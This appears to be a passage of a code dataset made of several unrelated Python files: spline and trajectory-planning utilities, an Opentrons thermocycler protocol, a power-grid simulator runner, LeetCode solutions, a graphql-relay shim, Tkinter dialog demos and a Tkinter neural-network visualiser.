calc_position(self, x):\n \"\"\"\n Calc `y` position for given `x`.\n if `x` is outside the data point's `x` range, return None.\n Returns\n -------\n y : float\n y position for given x.\n \"\"\"\n if x < self.x[0]:\n return None\n elif x > self.x[-1]:\n return None\n\n i = self.__search_index(x)\n dx = x - self.x[i]\n position = self.a[i] + self.b[i] * dx + \\\n self.c[i] * dx ** 2.0 + self.d[i] * dx ** 3.0\n\n return position\n\n def calc_first_derivative(self, x):\n \"\"\"\n Calc first derivative at given x.\n if x is outside the input x, return None\n Returns\n -------\n dy : float\n first derivative for given x.\n \"\"\"\n\n if x < self.x[0]:\n return None\n elif x > self.x[-1]:\n return None\n\n i = self.__search_index(x)\n dx = x - self.x[i]\n dy = self.b[i] + 2.0 * self.c[i] * dx + 3.0 * self.d[i] * dx ** 2.0\n\n return dy\n\n def calc_second_derivative(self, x):\n \"\"\"\n Calc second derivative at given x.\n if x is outside the input x, return None\n Returns\n -------\n ddy : float\n second derivative for given x.\n \"\"\"\n\n if x < self.x[0]:\n return None\n elif x > self.x[-1]:\n return None\n\n i = self.__search_index(x)\n dx = x - self.x[i]\n ddy = 2.0 * self.c[i] + 6.0 * self.d[i] * dx\n\n return ddy\n\n def __search_index(self, x):\n \"\"\"\n search data segment index\n \"\"\"\n return bisect.bisect(self.x, x) - 1\n\n def __calc_A(self, h):\n \"\"\"\n calc matrix A for spline coefficient c\n \"\"\"\n A = np.zeros((self.nx, self.nx))\n A[0, 0] = 1.0\n for i in range(self.nx - 1):\n if i != (self.nx - 2):\n A[i + 1, i + 1] = 2.0 * (h[i] + h[i + 1])\n A[i + 1, i] = h[i]\n A[i, i + 1] = h[i]\n\n A[0, 1] = 0.0\n A[self.nx - 1, self.nx - 2] = 0.0\n A[self.nx - 1, self.nx - 1] = 1.0\n\n return A\n\n def __calc_B(self, h, a):\n \"\"\"\n calc matrix B for spline coefficient c\n \"\"\"\n B = np.zeros(self.nx)\n for i in range(self.nx - 2):\n B[i + 1] = 3.0 * (a[i + 2] - a[i + 1]) / h[i + 1]\\\n - 3.0 * (a[i + 1] - a[i]) / h[i]\n\n return B\n\nclass CubicSpline2D:\n \"\"\"\n Cubic CubicSpline2D class\n Parameters\n ----------\n x : list\n x coordinates for data points.\n y : list\n y coordinates for data points.\n \"\"\"\n\n def __init__(self, x, y):\n self.s = self.__calc_s(x, y)\n self.sx = CubicSpline1D(self.s, x)\n self.sy = CubicSpline1D(self.s, y)\n\n def __calc_s(self, x, y):\n dx = np.diff(x)\n dy = np.diff(y)\n self.ds = np.hypot(dx, dy)\n s = [0]\n s.extend(np.cumsum(self.ds))\n\n return s\n\n def calc_position(self, s):\n \"\"\"\n calc position\n Parameters\n ----------\n s : float\n distance from the start point. if `s` is outside the data point's\n range, return None.\n Returns\n -------\n x : float\n x position for given s.\n y : float\n y position for given s.\n \"\"\"\n x = self.sx.calc_position(s)\n y = self.sy.calc_position(s)\n\n return x, y\n\n def calc_curvature(self, s):\n \"\"\"\n calc curvature\n Parameters\n ----------\n s : float\n distance from the start point. if `s` is outside the data point's\n range, return None.\n Returns\n -------\n k : float\n curvature for given s.\n \"\"\"\n dx = self.sx.calc_first_derivative(s)\n ddx = self.sx.calc_second_derivative(s)\n dy = self.sy.calc_first_derivative(s)\n ddy = self.sy.calc_second_derivative(s)\n k = (ddy * dx - ddx * dy) / ((dx ** 2 + dy ** 2)**(3 / 2))\n\n return k\n\n def calc_yaw(self, s):\n \"\"\"\n calc yaw\n Parameters\n ----------\n s : float\n distance from the start point. if `s` is outside the data point's\n range, return None.\n Returns\n -------\n yaw : float\n yaw angle (tangent vector) for given s.\n \"\"\"\n dx = self.sx.calc_first_derivative(s)\n dy = self.sy.calc_first_derivative(s)\n yaw = math.atan2(dy, dx)\n\n return yaw\n\nclass FrenetPath:\n def __init__(self):\n self.t = []\n self.d = []\n self.d_d = []\n self.d_dd = []\n self.d_ddd = []\n self.s = []\n self.s_d = []\n self.s_dd = []\n self.s_ddd = []\n self.cd = 0.0\n self.cv = 0.0\n self.cf = 0.0\n\n self.x = []\n self.y = []\n self.yaw = []\n self.ds = []\n self.c = []\n\nclass QuinticPolynomial:\n def __init__(self, xs, vxs, axs, xe, vxe, axe, time):\n self.a0 = xs\n self.a1 = vxs\n self.a2 = axs / 2.0\n\n A = np.array([[time ** 3, time ** 4, time ** 5],\n [3 * time ** 2, 4 * time ** 3, 5 * time ** 4],\n [6 * time, 12 * time ** 2, 20 * time ** 3]])\n b = np.array([xe - self.a0 - self.a1 * time - self.a2 * time ** 2,\n vxe - self.a1 - 2 * self.a2 * time,\n axe - 2 * self.a2])\n x = np.linalg.solve(A, b)\n\n self.a3 = x[0]\n self.a4 = x[1]\n self.a5 = x[2]\n\n def calc_point(self, t):\n xt = self.a0 + self.a1 * t + self.a2 * t ** 2 + \\\n self.a3 * t ** 3 + self.a4 * t ** 4 + self.a5 * t ** 5\n\n return xt\n\n def calc_first_derivative(self, t):\n xt = self.a1 + 2 * self.a2 * t + \\\n 3 * self.a3 * t ** 2 + 4 * self.a4 * t ** 3 + 5 * self.a5 * t ** 4\n\n return xt\n\n def calc_second_derivative(self, t):\n xt = 2 * self.a2 + 6 * self.a3 * t + 12 * self.a4 * t ** 2 + 20 * self.a5 * t ** 3\n\n return xt\n\n def calc_third_derivative(self, t):\n xt = 6 * self.a3 + 24 * self.a4 * t + 60 * self.a5 * t ** 2\n\n return xt\n\n\nclass CubicPolynomial:\n def __init__(self, vxs, axs, vxe, axe, time):\n self.a0 = vxs\n self.a1 = axs\n\n A = np.array([[time ** 2, time ** 3],\n [2 * time, 3 * time ** 2]])\n b = np.array([vxe - self.a0 - self.a1 * time,\n axe - self.a1])\n x = np.linalg.solve(A, b)\n\n self.a2 = x[0]\n self.a3 = x[1]\n\n def calc_point(self, t):\n xt = self.a0 + self.a1 * t + self.a2 * t ** 2 + self.a3 * t ** 3\n\n return xt\n\n def calc_first_derivative(self, t):\n xt = self.a1 + 2 * self.a2 * t + 3 * self.a3 * t ** 2\n\n return xt\n\n def calc_second_derivative(self, t):\n xt = 2 * self.a2 + 6 * self.a3 * t\n\n return xt\n\ndef generate_target_course(x, y):\n csp = CubicSpline2D(x, y)\n s = np.arange(0, csp.s[-1], 0.1)\n\n rx, ry, ryaw, rk = [], [], [], []\n for i_s in s:\n ix, iy = csp.calc_position(i_s)\n rx.append(ix)\n ry.append(iy)\n ryaw.append(csp.calc_yaw(i_s))\n rk.append(csp.calc_curvature(i_s))\n\n return rx, ry, ryaw, rk, csp\n\ndef wrap_to_pi(theta):\n return (theta+np.pi) % (2*np.pi) - np.pi\n\ndef generate_lon_profile(v_s, a_s, acc): \n v_target = np.clip(v_s + acc * 3, 0, 16)\n if acc != 0:\n t_target = round((v_target - v_s) / acc, 3)\n t_target = np.clip(t_target, 0.1, 3)\n else:\n t_target = 3\n\n T = np.arange(0, t_target, 0.1)\n lon_profile = CubicPolynomial(v_s, a_s, v_target, 0, t_target)\n speed = [lon_profile.calc_point(t) for t in T]\n\n if len(speed) < 30:\n speed.extend([speed[-1] for _ in range(30-len(speed))])\n \n speed = np.clip(speed, 0.01, 16)\n displacement = np.cumsum(speed * 0.1)\n\n return speed, displacement \n\ndef generate_lat_profile(d, v_d):\n d_target = 0\n t_target = np.clip(np.abs(d - d_target) / 1.5, 0.1, 3)\n T = np.arange(0.1, t_target+0.1, 0.1) \n lat_profile = QuinticPolynomial(d, v_d, 0, d_target, 0, 0, t_target)\n displacement = [lat_profile.calc_point(t) for t in T]\n speed = [lat_profile.calc_first_derivative(t) for t in T]\n \n if len(speed) < 30:\n speed.extend([speed[-1] for _ in range(30-len(speed))])\n displacement.extend([displacement[-1] for _ in range(30-len(displacement))])\n\n return speed, displacement","repo_name":"MCZhi/Predictive-Decision","sub_path":"planner_utils.py","file_name":"planner_utils.py","file_ext":"py","file_size_in_byte":9732,"program_lang":"python","lang":"en","doc_type":"code","stars":57,"dataset":"github-code","pt":"7"} +{"seq_id":"27761495847","text":"from opentrons import protocol_api\r\n\r\nmetadata = {'apiLevel': '2.2',\r\n 'protocolName': 'Thermocycle template (optional)',\r\n 'author': 'Gabrielle Johnston',\r\n 'description': 'Optional thermocycle template for after clip'}\r\n\r\n\r\ndef run(protocol: protocol_api.ProtocolContext):\r\n\r\n def thermocycler(well_plate_type='biorad_96_wellplate_200ul_pcr'):\r\n\r\n protocol.comment('Insert the thermocycler module to the opentrons.')\r\n protocol.comment(\r\n 'Place the clip reaction plate in the opentrons module')\r\n tc_mod = protocol.load_module('thermocycler')\r\n tc_mod.open_lid()\r\n clip_plate = tc_mod.load_labware(well_plate_type)\r\n\r\n tc_mod.close_lid()\r\n profile1 = [\r\n {'temperature': 37, 'hold_time_seconds': 120},\r\n {'temperature': 20, 'hold_time_seconds': 60}]\r\n profile2 = [\r\n {'temperature': 50, 'hold_time_seconds': 300},\r\n {'temperature': 80, 'hold_time_seconds': 1200}]\r\n\r\n tc_mod.execute_profile(steps=profile1, repetitions=20)\r\n tc_mod.execute_profile(steps=profile2, repetitions=1)\r\n tc_mod.open_lid()\r\n protocol.comment(\r\n 'Remove the clip reaction plate and proceed with purification.')\r\n tc_mod.deactivate()\r\n\r\n thermocycler(well_plate_type=well_plate_type)\r\n","repo_name":"Imperial-iGEM/DJANGO-Assembly-Methods","sub_path":"basic_assembly/dna_bot/template_ot2_scripts/thermocycle_template.py","file_name":"thermocycle_template.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"} +{"seq_id":"1274884374","text":"import numpy as np\nfrom pypownet.runner import Runner\n\n\nclass WrappedRunner(Runner):\n def __init__(self, environment, agent, render=False, verbose=False, vverbose=False, parameters=None, level=None,\n max_iter=None, log_filepath='runner.log', machinelog_filepath='machine_logs.csv'):\n super().__init__(environment, agent, render, verbose, vverbose, parameters, level, max_iter, log_filepath,\n machinelog_filepath)\n\n def step(self, observation):\n \"\"\"\n Performs a full RL step: the agent acts given an observation, receives and process the reward, and the env is\n resetted if done was returned as True; this also logs the variables of the system including actions,\n observations.\n :param observation: input observation to be given to the agent\n :return: (new observation, action taken, reward received)\n \"\"\"\n action = self.agent.act(observation)\n\n # Update the environment with the chosen action\n observation, reward_aslist, done, info = self.environment.step(action, do_sum=False)\n if done:\n observation = self.environment.process_game_over()\n elif info:\n self.logger.warning(info.text)\n\n reward = sum(reward_aslist)\n\n if self.render:\n self.environment.render()\n\n self.agent.feed_reward(action, observation, reward_aslist)\n\n return observation, action, reward, reward_aslist, done, info\n\n def loop(self, iterations, epochs=1):\n \"\"\"\n Runs the simulator for the given number of iterations time the number of episodes.\n :param iterations: int of number of iterations per episode\n :param epochs: int of number of episodes, each resetting the environment at the beginning\n :return:\n \"\"\"\n cumul_rew = 0.0\n dones = []\n infos = []\n for i_episode in range(epochs):\n observation = self.environment.process_game_over()\n for i in range(1, iterations + 1):\n (observation, action, reward, reward_aslist, done, info) = self.step(observation)\n cumul_rew += reward\n dones.append(done)\n infos.append(info)\n\n return cumul_rew, dones, infos\n\n\ndef get_verbose_node_topology(obs, action_space):\n \"\"\"This function returns the topology, ie, split nodes are displayed\"\"\"\n n_bars = len(action_space.substations_ids)\n # The following code allows to get just the nodes ids\n # where there are elements connected. It also considerer\n # the split node action.\n all_sub_conf = []\n for sub_id in obs.substations_ids:\n sub_conf, _ = obs.get_nodes_of_substation(sub_id)\n all_sub_conf.append(sub_conf)\n\n nodes_ids = np.arange(1, n_bars + 1)\n for i in range(len(all_sub_conf)):\n # Check if all elements in sub (i) are connected to busbar B1.\n # print(np.equal(all_sub_conf[i], np.ones(len(all_sub_conf[i]))))\n # print(\"np.ones(len(all_sub_conf[i] = \", np.ones(len(all_sub_conf[i])))\n # print(\"type = \", type(np.equal(all_sub_conf[i], np.ones(len(all_sub_conf[i])))))\n if (np.equal(all_sub_conf[i], np.ones(len(all_sub_conf[i])))).all():\n # Remove the existing node.\n nodes_ids = np.delete(nodes_ids, i)\n # And create a new node.\n nodes_ids = np.append(nodes_ids, int(str(666) + str(i + 1)))\n # Check if one or more elements\n # are connected to busbar B1.\n elif np.sum(all_sub_conf[i]) > 0:\n nodes_ids = np.append(nodes_ids, int(str(666) + str(i + 1)))\n\n nodes_ids = list(nodes_ids)\n\n for node in obs.substations_ids:\n conf = obs.get_nodes_of_substation(node)\n # print(f\"node [{node}] config = {conf}\")\n # print(f\"func: get_verbose_topo: node [{node}]\")\n ii = 0\n for elem, type in zip(conf[0], conf[1]):\n # print(f\"element n°[{ii}] connected to BusBar n°[{elem}] is a [{type}]\")\n ii += 1\n return list(nodes_ids)","repo_name":"MarvinLer/pypownet","sub_path":"tests/common_assets.py","file_name":"common_assets.py","file_ext":"py","file_size_in_byte":4058,"program_lang":"python","lang":"en","doc_type":"code","stars":100,"dataset":"github-code","pt":"7"} +{"seq_id":"37729129533","text":"# https://leetcode.com/problems/find-the-index-of-the-first-occurrence-in-a-string/\n\nclass Solution:\n def strStr(self, haystack: str, needle: str) -> int:\n \"\"\"\n Logic: Take the length of needle and loop through \n each position of haystack and find if it matches\n \n Time: O(n)\n Space: O(1)\n \"\"\"\n # Base case: needle is empty, no need to find\n if not needle: return 0\n \n n = len(needle)\n \n for i in range(len(haystack)):\n if haystack[i:i+n] == needle:\n return i\n \n return -1\n","repo_name":"hanelliotn/leetcode","sub_path":"00028-FindTheIndexOfTheFirstOccurrenceInAString.py","file_name":"00028-FindTheIndexOfTheFirstOccurrenceInAString.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"7"} +{"seq_id":"1336019863","text":"import warnings\n\n# noinspection PyDeprecation\nfrom .array_connection import (\n connection_from_array,\n connection_from_array_slice,\n cursor_for_object_in_connection,\n cursor_to_offset,\n get_offset_with_default,\n offset_to_cursor,\n SizedSliceable,\n)\n\n# Deprecated functions from older graphql-relay-py versions\n# noinspection PyProtectedMember,PyUnresolvedReferences,PyDeprecation\nfrom .array_connection import ( # noqa: F401\n connection_from_list,\n connection_from_list_slice,\n)\n\nwarnings.warn(\n \"The 'arrayconnection' module is deprecated. \"\n \"Functions should be imported from the top-level package instead.\",\n DeprecationWarning,\n stacklevel=2,\n)\n\n__all__ = [\n \"connection_from_array\",\n \"connection_from_array_slice\",\n \"cursor_for_object_in_connection\",\n \"cursor_to_offset\",\n \"get_offset_with_default\",\n \"offset_to_cursor\",\n \"SizedSliceable\",\n]\n","repo_name":"iyushaw/Fastapi_Docker_Dev","sub_path":"env/lib/python3.8/site-packages/graphql_relay/connection/arrayconnection.py","file_name":"arrayconnection.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"44961581900","text":"from tkinter import *\nfrom tkinter.messagebox import *\n\n# функция askquestion предлагает yes или no крестик не активен, возвращает yes или no\ndef ask_question(event):\n answer = askquestion('AskQuestion', 'Вопрос первый?')\n label1.configure(text=answer)\n\n# функция askokcancel предлагает ok или Cancel, возвращает 1 или 0\ndef ask_ok(event):\n answer = askokcancel('AskOkCancel', 'Вопрос второй?')\n label2.configure(text=answer)\n\n# функция askyesno предлагает yes или no, возвращает 1 или 0\ndef ask_yesno(event):\n answer = askyesno('AskYesNo', 'Вопрос третий?')\n label3.configure(text=answer)\n\n# функция askretrycancel предлагает retry или cancel, возвращает 1 или 0\ndef ask_rc(event):\n answer = askretrycancel('AskRetryCancel', 'Вопрос четвертый?')\n label4.configure(text=answer)\n\nroot = Tk()\nroot.title('Диалоговые окна_2')\n\nbtn1 = Button(root, text='askquestion', font=('Calibri', 20), width=12)\nbtn1.grid(row=0, column=0, sticky='ew')\nlabel1 = Label(root, font=('Calibri', 20), width=12)\nlabel1.grid(row=0, column=1)\nbtn1.bind(\"\", ask_question)\n\nbtn2 = Button(root, text='askokcancel', font=('Calibri', 20), width=12)\nbtn2.grid(row=1, column=0, sticky='ew')\nlabel2 = Label(root, font=('Calibri', 20), width=12)\nlabel2.grid(row=1, column=1)\nbtn2.bind(\"\", ask_ok)\n\nbtn3 = Button(root, text='askyesno', font=('Calibri', 20), width=12)\nbtn3.grid(row=2, column=0, sticky='ew')\nlabel3 = Label(root, font=('Calibri', 20), width=12)\nlabel3.grid(row=2, column=1)\nbtn3.bind(\"\", ask_yesno)\n\nbtn4 = Button(root, text='askretrycancel', font=('Calibri', 20), width=12)\nbtn4.grid(row=3, column=0, sticky='ew')\nlabel4 = Label(root, font=('Calibri', 20), width=12)\nlabel4.grid(row=3, column=1)\nbtn4.bind(\"\", ask_rc)\n\nroot.mainloop()\n","repo_name":"mikibouns/Tkinter","sub_path":"tkinter_lesson_ДиалоговыеОкна_13.py","file_name":"tkinter_lesson_ДиалоговыеОкна_13.py","file_ext":"py","file_size_in_byte":1996,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"22349425606","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def mergeTwoLists(self, list1: Optional[ListNode], list2: Optional[ListNode]) -> Optional[ListNode]:\n dummy = ListNode()\n curr = dummy\n # edge case\n if not list1:\n return list2\n if not list2:\n return list1\n while list1 and list2:\n if list1.val <= list2.val:\n curr.next = list1\n list1 = list1.next\n else:\n curr.next = list2\n list2 = list2.next\n curr = curr.next\n # gather the remaining elements in l1 and l2\n if list1:\n curr.next = list1\n elif list2:\n curr.next = list2\n return dummy.next\n \n## Time Complexity: O(N)\n## Space Complexity: O(1)","repo_name":"priyanka-asnani/Leetcode-Problems","sub_path":"Linked List/21. Merge Two Sorted Lists.py","file_name":"21. Merge Two Sorted Lists.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"43438971808","text":"import math\r\nimport random\r\nimport time\r\nimport cv2\r\nimport math\r\nfrom tkinter import *\r\n\r\nroot = Tk()\r\nroot.title(\"Neural Network\")\r\n\r\nwindow_width=600\r\nwindow_height=750\r\ncanvas = Canvas(root, width=window_width, height=window_height, background=\"black\")\r\ncanvas.grid()\r\n\r\ndef der_sig(x):\r\n return sig(x) * (1 - sig(x))\r\n\r\n\r\ndef sig(x):\r\n val = 1 / (1 + 1 / pow(math.e, x))\r\n return val\r\n\r\n\r\n'''\r\ndef der_sig(x):\r\n return 1.0/(1+pow(math.e, -x))\r\n\r\n\r\ndef sig(x):\r\n return math.log((1+pow(math.e, x)))\r\n\r\ndef der_sig(x):\r\n return -1.0*2.0*x/(x**2+1)**2\r\ndef sig(x):\r\n return 1.0/(x**2+1)\r\n\r\n\r\ndef der_sig(x):\r\n if x == 0:\r\n return 0\r\n else:\r\n return math.cos(x)/x-math.sin(x)/(x**2)\r\n\r\ndef sig(x):\r\n if x == 0:\r\n return 1\r\n else:\r\n return math.sin(x)/x\r\n'''\r\nmse = 0\r\nepochs = 0\r\nlearning_rate = 0.5\r\nmomentum = 0.1\r\n\r\nNN_window_x1 = 100\r\nNN_window_x2 = 500\r\n\r\nNN_window_y1 = 50\r\nNN_window_y2 = window_height-50\r\n\r\nnum_layers = 3\r\n\r\ninputs = [[0], [0.1],[0.2],[0.3],[0.4],[0.5],[0.6],[0.7],[0.8],[0.9],[1]]\r\nexpected = [[0,0,0,0],[0,0,0,1],[0,0,1,0],[0,0,1,1],[0,1,0,0],[0,1,0,1],[0,1,1,0],[0,1,1,1],[1,0,0,0],[1,0,0,1],[1,0,1,0]]\r\nnewinput = [[0.25]]\r\n\r\n#inputs = [[0], [0.1],[0.2],[0.3],[0.4],[0.5],[0.6],[0.7]]\r\n#expected = [[0,0,0],[0,0,1],[0,1,0],[0,1,1],[1,0,0],[1,0,1],[1,1,0],[1,1,1]]\r\n#newinput = [[0.25]]\r\n\r\n#inputs = [[0, 0, 0], [0, 0, 1], [0, 1, 0], [0, 1, 1], [1, 0, 0], [1, 0, 1], [1, 1, 0], [1, 1, 1]]\r\n#expected = [[0, 0, 1], [0, 1, 0], [0, 1, 1], [1, 0, 0], [1, 0, 1], [1, 1, 0], [1, 1, 1], [0, 0, 0]]\r\n#newinput = [[0, 0, 0]]\r\n\r\n\r\n#inputs = [[0,0], [0,1],[1,0],[1,1]]\r\n#expected = [[0],[1],[1],[0]]\r\n#newinput = [[0,1]]\r\n\r\n#inputs = [[0,0,0],[0,0,1],[0,1,0],[0,1,1],[1,0,0],[1,0,1],[1,1,0],]\r\n#expected = [[0,1],[1,0],[1,1],[0,0],[0,1],[1,0],[1,1],[0,0]]\r\n#newinput = [[0,0,0]]\r\n\r\n#inputs = [[0, 0], [0, 1], [1, 0], [1, 1]]\r\n#expected = [[0,0], [1,0], [1,0], [0, 1]]\r\n#newinput = [[1, 1]]\r\n\r\n\r\ninputs = [[0, 0, 0, 0], [0, 0, 0, 1], [0, 0, 1, 0], [0, 0, 1, 1], [0, 1, 0, 0], [0, 1, 0, 1], [0, 1, 1, 0], [0, 1, 1, 1], \\\r\n [1, 0, 0, 0], [1, 0, 0, 1], [1, 0, 1, 0], [1, 0, 1, 1], [1, 1, 0, 0], [1, 1, 0, 1], [1, 1, 1, 0], [1, 1, 1, 1]]\r\nexpected = [ [0, 0, 0, 1], [0, 0, 1, 0], [0, 0, 1, 1], [0, 1, 0, 0], [0, 1, 0, 1], [0, 1, 1, 0], [0, 1, 1, 1], \\\r\n [1, 0, 0, 0], [1, 0, 0, 1], [1, 0, 1, 0], [1, 0, 1, 1], [1, 1, 0, 0], [1, 1, 0, 1], [1, 1, 1, 0],[1, 1, 1, 1],[0, 0, 0, 0]]\r\n\r\nnewinput = [[1, 0, 0, 0]]\r\n\r\n\r\nl1 = len(inputs[0])\r\n\r\nl2 = 10\r\n\r\nl3 = len(expected[0])\r\n\r\nwidths = [l1, l2, l3]\r\n\r\ndef create_circle(x, y, r, **kwargs):\r\n canvas.create_oval(x - r, y - r, x + r, y + r, **kwargs)\r\n\r\n\r\nclass Neuron:\r\n num_neurons = 0\r\n\r\n def __init__(self, layer, neuron_number):\r\n self.name = \"inited\"\r\n self.layer = layer\r\n self.neuron_num = neuron_number\r\n self.dendrites = [] # list of connections\r\n self.sum = 0\r\n self.sumout = 0\r\n self.delta = 0\r\n Neuron.num_neurons += 1\r\n\r\n self.graphic_prop = Graphic_prop(0, 0)\r\n\r\n def init_graphic(self):\r\n self.graphic_prop.x1 = NN_window_x1 + (NN_window_x2 - NN_window_x1) * (self.layer-1) / (num_layers-1)\r\n self.graphic_prop.y1 = NN_window_y1 + (NN_window_y2 - NN_window_y1) * self.neuron_num / (widths[self.layer-1])\r\n create_circle(self.graphic_prop.x1, self.graphic_prop.y1, 15, fill=\"#BBB\", outline=\"\")\r\n canvas.create_text(self.graphic_prop.x1, self.graphic_prop.y1+15, text=\"{}\".format(self.delta), anchor=N,\r\n fill='white')\r\n\r\n #canvas.update()\r\n\r\n def activation_fn(self):\r\n # self.sumout = 1 / (1 + pow(math.e, -self.sum))\r\n self.sumout = sig(self.sum)\r\n\r\n def summer(self):\r\n self.name = \"summing\"\r\n self.sum = 0\r\n for conn in self.dendrites:\r\n self.sum += conn.output # output after applying weights\r\n Neuron.activation_fn(self)\r\n # print(\"layer : {0} sumout : {1}\".format(self.layer, self.sumout))\r\n\r\n def num_dendrites(self):\r\n return len(self.dendrites)\r\n\r\n\r\nclass Connection:\r\n num_connections = 0\r\n max_weight = 1\r\n min_weight = 0\r\n\r\n max_weight_wip = 1 #wt with ip\r\n min_weight_wip = -1\r\n\r\n wip = False\r\n\r\n def __init__(self, prev_neuron, next_neuron, layer):\r\n self.weight = random.uniform(Connection.min_weight, Connection.max_weight)\r\n #print(self.weight)\r\n self.prev_neuron = prev_neuron\r\n self.sum = 0\r\n self.output = 0\r\n self.gradient = 0\r\n self.prev_gradient = 0\r\n self.del_weight = 0\r\n self.sum_del_weight = 0\r\n self.prev_del_weight = 0\r\n next_neuron.dendrites.append(self)\r\n self.next_neuron_graphic_prop = next_neuron.graphic_prop\r\n self.layer = layer\r\n Connection.num_connections += 1\r\n\r\n # graphic prop\r\n self.graphic_prop = Graphic_prop(0, 0)\r\n\r\n def init_graphic(self):\r\n r = 20\r\n w = 2\r\n if self.wip:\r\n\r\n if self.output < 0:\r\n g = 20\r\n r = int((self.output - Connection.min_weight_wip) * (160 - 100) / (Connection.max_weight_wip - Connection.min_weight_wip) + 100)\r\n tk_rgb = \"#%02x%02x%02x\" % (int(0.8*r), int(g), int(0.2 * g))\r\n else:\r\n r = 50\r\n g = int((self.output - Connection.min_weight_wip) * (175 - 100) / (Connection.max_weight_wip - Connection.min_weight_wip) + 100)\r\n tk_rgb = \"#%02x%02x%02x\" % (int(0.3 * r), int(g), int(0.4 * g))\r\n if self.output == 0:\r\n r=130\r\n tk_rgb = \"#%02x%02x%02x\" % (50,50,50)\r\n else:\r\n if self.weight < 0:\r\n g = 20\r\n r = int((self.output - Connection.min_weight) * (160 - 100) / (Connection.max_weight - Connection.min_weight) + 100)\r\n tk_rgb = \"#%02x%02x%02x\" % (int(r*0.9), g, int(0.2 * g))\r\n else:\r\n r = 50\r\n g = int((self.weight - Connection.min_weight) * (170 - 100) / (Connection.max_weight - Connection.min_weight) + 100)\r\n tk_rgb = \"#%02x%02x%02x\" % (int(0.2 * r), g, int(0.2 * g))\r\n if self.weight == 0:\r\n r=130\r\n tk_rgb = \"#%02x%02x%02x\" % (50,40,40)\r\n #(x - in_min) * (out_max - out_min) / (in_max - in_min) + out_min;\r\n #print(g)\r\n\r\n\r\n if g>135 or r>115:\r\n w=3\r\n if g>145 or r>125:\r\n w=4\r\n if g>155 or r>135:\r\n w=5\r\n if g>165 or r>145:\r\n w=6\r\n\r\n canvas.create_line(self.prev_neuron.graphic_prop.x1, self.prev_neuron.graphic_prop.y1,\\\r\n self.next_neuron_graphic_prop.x1, self.next_neuron_graphic_prop.y1, width=w, fill=tk_rgb)\r\n #canvas.update()\r\n\r\n def apply_weight(self):\r\n self.output = self.prev_neuron.sumout * self.weight\r\n if Connection.max_weight < self.weight:\r\n Connection.max_weight = self.weight\r\n else:\r\n if Connection.min_weight > self.weight:\r\n Connection.min_weight = self.weight\r\n if Connection.max_weight_wip < self.output:\r\n Connection.max_weight_wip = self.output\r\n else:\r\n if Connection.min_weight_wip > self.output:\r\n Connection.min_weight_wip = self.output\r\n # print(\"{0}*{1}={2}:\".format(self.prev_neuron.sumout,self.weight,self.output))\r\n\r\n\r\nclass Graphic_prop:\r\n def __init__(self, x1, y1):\r\n self.x1 = x1\r\n self.y1 = y1\r\n self.x2 = 0\r\n self.y2 = 0\r\n self.color = Graphic_prop.rgb_to_hex(255, 255, 255)\r\n\r\n @staticmethod\r\n def rgb_to_hex(r, g, b):\r\n return '#%02x%02x%02x' % (r, g, b)\r\n\r\n\r\nconn_layer1 = []\r\nconn_layer2 = []\r\nconn_layer3 = []\r\n\r\nconns = []\r\n\r\ni = 0\r\nj = 0\r\n\r\nLayer1 = [Neuron(1, i) for i in range(0, l1)]\r\nLayer2 = [Neuron(2, i) for i in range(0, l2)]\r\nLayer3 = [Neuron(3, i) for i in range(0, l3)]\r\n\r\n\r\nfor i in range(l1):\r\n for j in range(l2):\r\n conn_layer1.append(Connection(Layer1[i], Layer2[j], 1))\r\nfor i in range(l2):\r\n for j in range(l3):\r\n conn_layer2.append(Connection(Layer2[i], Layer3[j], 2))\r\n\r\n#for i in range(l3):\r\n# conn_layer3.append(Connection(Layer3[i], Layer1[i]))\r\n# conn_layer3[i].weight = 1\r\n\r\n\r\ndef redraw_del():\r\n canvas.delete(ALL)\r\n\r\n for i in range(0, l1):\r\n Layer1[i].init_graphic()\r\n\r\n for i in range(0, l2):\r\n Layer2[i].init_graphic()\r\n\r\n for i in range(0, l3):\r\n Layer3[i].init_graphic()\r\n\r\n for i in range(len(conn_layer1)):\r\n\r\n conn_layer1[i].apply_weight()\r\n for i in range(len(conn_layer1)):\r\n conn_layer1[i].init_graphic()\r\n time.sleep(0.1)\r\n canvas.update()\r\n\r\n for i in range(len(conn_layer2)):\r\n conn_layer2[i].apply_weight()\r\n for i in range(len(conn_layer2)):\r\n conn_layer2[i].init_graphic()\r\n\r\n time.sleep(0.1)\r\n canvas.update()\r\n\r\n\r\ndef redraw(ip=-1):\r\n canvas.delete(ALL)\r\n\r\n for i in range(len(conn_layer1)):\r\n conn_layer1[i].init_graphic()\r\n\r\n for i in range(len(conn_layer2)):\r\n conn_layer2[i].init_graphic()\r\n\r\n for i in range(0, l1):\r\n Layer1[i].init_graphic()\r\n\r\n for i in range(0, l2):\r\n Layer2[i].init_graphic()\r\n\r\n for i in range(0, l3):\r\n Layer3[i].init_graphic()\r\n\r\n canvas.create_text(50, window_height-50, text=\"MSE: {}\".format(mse), anchor=SW, fill='white')\r\n canvas.create_text(50, window_height-25, text=\"Epochs: {}\".format(epochs), anchor=SW, fill='white')\r\n\r\n if ip >= 0:\r\n for i in range(0, l1):\r\n x1 = NN_window_x1 - 30\r\n y1 = NN_window_y1 + (NN_window_y2 - NN_window_y1) * i / (widths[0])\r\n canvas.create_text(x1, y1, text=\"{}\".format(inputs[ip][i]), anchor=SW, fill='white')\r\n for i in range(0, l3):\r\n x1 = NN_window_x2 + 30\r\n y1 = NN_window_y1 + (NN_window_y2 - NN_window_y1) * i / (widths[2])\r\n canvas.create_text(x1, y1, text=\"{0:.2f}\".format(Layer3[i].sumout,2), anchor=SW, fill='white')\r\n\r\n canvas.update()\r\n\r\n\r\ndef feed_forward():\r\n # print(\" \")\r\n # print(\" \")\r\n for i in range(len(conn_layer1)):\r\n conn_layer1[i].apply_weight()\r\n # 